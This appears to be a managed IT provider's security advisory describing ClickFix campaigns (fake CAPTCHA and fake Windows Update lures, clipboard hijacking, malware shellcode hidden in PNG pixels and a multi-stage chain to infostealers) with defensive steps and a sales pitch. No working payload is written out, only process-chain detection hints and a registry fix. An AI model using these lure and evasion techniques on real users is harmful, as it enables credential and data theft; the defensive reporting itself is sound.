ClickFix Malware Gets Creative: How Cybercriminals Hide Threats Inside Innocent Images

• Robot Verification Lures: Fake CAPTCHA or “human verification” pages instruct users to press Win+R to open the Windows Run box, then Ctrl+V to paste a command that was secretly copied to their clipboard
• Fake Windows Update Screens: A newer variant displays a full-screen Windows Update animation that appears completely legitimate, eventually prompting users to paste a malicious command to “complete” the update
• Clipboard Hijacking: When victims visit these malicious sites, JavaScript automatically copies a harmful command to their clipboard without their knowledge
• Multi-Stage Execution: The initial command triggers a complex chain of events that ultimately installs information-stealing malware

The fake Windows Update lure is particularly effective because it mimics Microsoft’s actual update interface so closely that even cautious users might be fooled. The screen enters full-screen mode, displays realistic “Working on updates” animations, and only reveals its true nature at the very end.

(Human Verification Lure – Source: Huntress)

 The Steganography Twist

What sets this campaign apart from typical malware distribution is the use of steganography to conceal the final malicious payload. Rather than simply attaching malware to a file or downloading it from a suspicious server, the attackers encode their payload directly into the pixel data of PNG images.

• Pixel-Level Concealment: The malicious code is embedded within specific color channels of image pixels, making it invisible to the naked eye and most security tools
• Memory-Only Extraction: The shellcode is extracted and decrypted entirely in memory, leaving minimal traces on disk for forensic analysis
• AES Encryption: The embedded images themselves are encrypted within the malware loader, adding another layer of protection against detection
• Custom Algorithm: Attackers use a proprietary steganographic algorithm that reads specific color channel data to reconstruct the hidden payload

This technique effectively bypasses signature-based security solutions that scan for known malware patterns. The images appear completely benign during transit and storage.

(Decrypted Image Containing Shellcode – Source: Huntress)

 The Complete Attack Chain

Once a victim pastes and runs the malicious command, a sophisticated multi-stage infection process begins:

• Stage 1: The command uses mshta.exe to download and execute a JScript payload from an attacker-controlled server
• Stage 2: PowerShell code filled with junk instructions to confuse analysis downloads and decrypts a .NET assembly
• Stage 3: The .NET assembly extracts encrypted PNG images from its resources and uses the steganographic algorithm to pull shellcode from the pixel data
• Stage 4: A secondary .NET assembly is compiled on-the-fly to perform process injection, inserting the malicious code into legitimate Windows processes like explorer.exe
• Stage 5: The final payload – either LummaC2 or Rhadamanthys infostealer – executes within the trusted process

Each stage includes obfuscation techniques such as 10,000 empty function calls, extremely long variable names, and encrypted configuration strings to hinder security analysis.

(Windows Run Prompt output for the Human Verification Lure – Source: Huntress)

 The Malware Payloads

The ClickFix campaigns have been observed delivering two dangerous information-stealing malware variants:

• LummaC2: A capable infostealer that targets browser credentials, cryptocurrency wallets, and sensitive files while communicating with multiple command-and-control servers
• Rhadamanthys Stealer: A sophisticated infostealer that harvests credentials, cookies, and financial data, recently targeted by law enforcement in Operation Endgame
• Persistent Threat: Despite law enforcement action against Rhadamanthys infrastructure in November, the distribution infrastructure for these campaigns remained active, demonstrating the resilience of the threat actors

Both malware families can cause significant damage to businesses through credential theft, financial fraud, and data exfiltration.

(Fake Windows Update Lure – Source: Huntress)

 Who Is Behind These Attacks?

While specific attribution remains difficult, analysis of the ClickFix lure source code reveals some interesting details:

• Russian Language Comments: The fake Windows Update lure contains comments written in Russian, suggesting the threat actors may be Russian-speaking
• Consistent Infrastructure: Multiple campaigns traced back to specific IP addresses and domain clusters indicate organized, ongoing operations
• Active Development: The evolution from simple robot verification lures to sophisticated fake Windows Update screens demonstrates continued investment in the attack methodology
• Evasion Focus: The emphasis on steganography and multi-stage execution shows threat actors prioritizing detection avoidance

The campaigns have been active since at least October 2025, with researchers tracking multiple clusters of related activity.

(Diagram Depicting the Execution Chain Leading to LummaC2 – Source: Huntress)

 Who Is At Risk?

Any organization with employees who access the internet faces potential exposure to ClickFix attacks:

• Small and Medium Businesses: Often lack dedicated security teams to identify and respond to sophisticated social engineering attacks
• Remote Workers: May encounter malicious sites while working outside corporate network protections
• Customer-Facing Staff: Employees who regularly interact with external websites and email links present higher risk
• Financial and Healthcare Organizations: High-value targets for information-stealing malware due to sensitive data access
• Any Windows Environment: The attacks specifically target Windows systems through the Run dialog functionality

The attack requires no special access or elevated privileges – any employee with standard Windows access can become a victim.

 Recommended Protections

Organizations can implement several measures to defend against ClickFix and similar attacks:

• Disable the Windows Run Box: Apply registry modifications or Group Policy settings to prevent users from accessing Win+R functionality: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
• Security Awareness Training: Educate employees that legitimate CAPTCHA verification and Windows Update processes never require pasting commands into the Run dialog
• Monitor Process Lineage: Configure EDR solutions to alert on suspicious process chains, particularly explorer.exe spawning mshta.exe or PowerShell
• Audit RunMRU Registry: During incident investigation, check HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU for evidence of executed commands
• Web Filtering: Block access to known malicious domains and suspicious newly-registered sites
• Endpoint Detection: Deploy solutions capable of detecting in-memory threats and anomalous process behavior

The most effective defense combines technical controls with user education, as the attack fundamentally relies on user interaction.

How CinchOps Can Help

The ClickFix steganography campaign illustrates how modern threats combine social engineering with advanced evasion techniques to bypass traditional security measures. Houston and Katy businesses need a managed IT partner that understands both the technical and human elements of cybersecurity.

CinchOps provides comprehensive protection through:

• Security Awareness Training: Customized programs that teach employees to recognize social engineering tactics including ClickFix lures and fake system prompts
• Endpoint Detection and Response: Advanced monitoring that identifies suspicious process behavior and in-memory threats that signature-based tools miss
• Group Policy Management: Proper configuration of Windows security settings to disable dangerous functionality like the Run dialog where appropriate
• 24/7 Threat Monitoring: Continuous oversight of your network to detect and respond to emerging threats before they cause damage
• Incident Response Planning: Preparation and procedures to minimize impact when attacks do occur
• Network Security Assessment: Evaluation of your current defenses to identify gaps that sophisticated attackers could exploit

Don’t wait for your business to become another ClickFix victim. Contact CinchOps today to discuss how our managed IT support and cybersecurity services can protect your Houston-area business from evolving threats.

 Discover More 

Discover more about our enterprise-grade and business protecting cybersecurity services: CinchOps Cybersecurity
Discover related topics: Sneaky2FA Phishing Kit Evolves with Browser-in-the-Browser Pop-ups Targeting Houston Businesses
For Additional Information on this topic: ClickFix Gets Creative: Malware Buried in Images

FREE CYBERSECURITY ASSESSMENT